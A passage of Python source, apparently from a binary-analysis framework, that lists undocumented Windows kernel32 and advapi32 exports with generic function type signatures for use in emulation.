"TermsrvAppInstallMode": SimTypeFunction([], SimTypeLong(signed=True)),
"RemoveLocalAlternateComputerNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LZCreateFileW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsUpdateLocale": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterWowBaseHandlers": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetClientTimeZoneInformation": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCheckRunApp": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseThreadInitThunk": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UpdateCalendarDayOfWeek": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleMaximumWindowSize": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertNLSDayOfWeekToWin32DayOfWeek": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertCalDateTimeToSystemTime": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ReplaceFile": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleCharType": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleInputWaitHandle": SimTypeFunction([], SimTypeLong(signed=True)),
"RestoreLastError": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CompareCalendarDates": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetLocalPrimaryComputerNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UnregisterConsoleIME": SimTypeFunction([], SimTypeLong(signed=True)),
"lstrcat": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseInitAppcompatCacheSupport": SimTypeFunction([], SimTypeLong(signed=True)),
"InterlockedPushListSList": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetEnvironmentStringsA": SimTypeFunction([], SimTypeLong(signed=True)),
"CreateSocketHandle": SimTypeFunction([], SimTypeLong(signed=True)),
"RegSetKeySecurity": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetThreadToken": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryInfoKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNumberOfConsoleFonts": SimTypeFunction([], SimTypeLong(signed=True)),
"GetCalendarSupportedDateRange": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegKrnGetGlobalState": SimTypeFunction([], SimTypeLong(signed=True)),
"WerpNotifyUseStringResource": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleFont": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseGetNamedObjectDirectory": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsCalendarLeapMonth": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteTreeW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsValidCalDateTime": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryValueExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleCursor": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteTreeA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SortGetHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpInitiateRemoteRecovery": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"VDMOperationStarted": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"OpenProcessToken": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"VDMConsoleOperation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseVerifyUnicodeString": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegUnLoadKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetProcessUserModeExceptionPolicy": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNextVDMCommand": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LoadStringBaseW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DuplicateConsoleHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCheckAppcompatCache": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpStringLookup": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseDumpAppcompatCache": SimTypeFunction([], SimTypeLong(signed=True)),
"CreateProcessInternalA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsEventDataDescCreate": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegRestoreKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsWriteEtwEvent": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegCloseKey": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NotifyMountMgr": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsCalendarLeapYear": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DosPathToSessionPathA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepAnsiStringToDynamicUnicodeString": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetLocalPrimaryComputerNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcpyn": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleLocalEUDC": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"PrivCopyFileExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleCursorMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterConsoleOS2": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleIcon": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteValueW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleInputExeNameW": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleHardwareState": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleCursorMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ReadConsoleInputExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpNotifyLoadStringResource": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCheckAppcompatCacheEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"PrivMoveFileIdentityW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CmdBatNotification": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseFormatTimeOut": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"InvalidateConsoleDIBits": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSaveKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsCalendarLeapDay": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCleanupAppcompatCacheSupport": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepAllocateActivationContextActivationBlock": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DelayLoadFailureHook": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WriteConsoleInputVDMA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcmp": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConsoleMenuControl": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseQueryModuleData": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadMUIStringW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetHandleContext": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IdnToUnicode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegKrnInitialize": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseFlushAppcompatCache": SimTypeFunction([], SimTypeLong(signed=True)),
"GetCalendarWeekNumber": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsUpdateSystemLocale": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetComPlusPackageInstallStatus": SimTypeFunction([], SimTypeLong(signed=True)),
"BaseIsAppcompatInfrastructureDisabled": SimTypeFunction([], SimTypeLong(signed=True)),
"WerpCleanupMessageMapping": SimTypeFunction([], SimTypeLong(signed=True)),
"RegisterWowExec": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepCheckAppCompat": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleMenuClose": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDifferenceInDays": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LoadStringBaseExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleInputExeNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsolePalette": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDaysInMonth": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseGenerateAppCompatData": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetLastConsoleEventActive": SimTypeFunction([], SimTypeLong(signed=True)),
"GetConsoleInputExeNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegGetValueW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetHandleContext": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleKeyShortcuts": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseUpdateAppcompatCache": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepFreeActivationContextActivationBlock": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetBinaryType": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"Basep8BitStringToDynamicUnicodeString": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryInfoKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepFreeAppCompatData": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CheckElevationEnabled": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDateFormatEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSetValueExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumValueA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleKeyboardLayoutNameW": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetComPlusPackageInstallStatus": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetVDMCurrentDirectories": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CloseConsoleHandle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EnumerateLocalComputerNamesA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UTUnRegister": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDateFormat": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetProcessUserModeExceptionPolicy": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CheckElevation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterWaitForInputIdle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSystemTimeToCalDateTime": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsTimeZoneRedirectionEnabled": SimTypeFunction([], SimTypeLong(signed=True)),
}
missing_declarations["advapi32"] = {
"GetInformationCodeAuthzLevelW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiFreeBuffer": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNamedSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceMultipleA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredProfileLoaded": SimTypeFunction([], SimTypeLong(signed=True)),
"WmiExecuteMethodW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ProcessIdleTasksW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD4Final": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction013": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpConvertOneCredentialSize": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EncryptedFileKeyInfo": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfBackupEventLogFileW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD4Update": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CloseCodeAuthzLevel": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EnumServiceGroupW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReportEventA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction027": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaEnumeratePrivilegesOfAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction024": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertAccessToSecurityDescriptorW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiDevInstToInstanceNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiEnumerateGuids": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiRegisterExtensionDll": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaCreateSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenEventLogW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenEventLogA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetUserName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"A_SHAInit": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenPolicySce": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfChangeNotify": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSetServiceBitsA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiOpenBlock": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetAccessPermissionsForObjectA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupNames": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UnregisterIdleTask": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction025": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfRegisterEventSourceA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction010": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiMofEnumerateResourcesA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSDToStringSDRootDomainW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"A_SHAFinal": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetSecurityObject": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetSystemAccessAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiFileHandleToInstanceNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"FreeEncryptedFileKeyInfo": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetRemoteUserName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
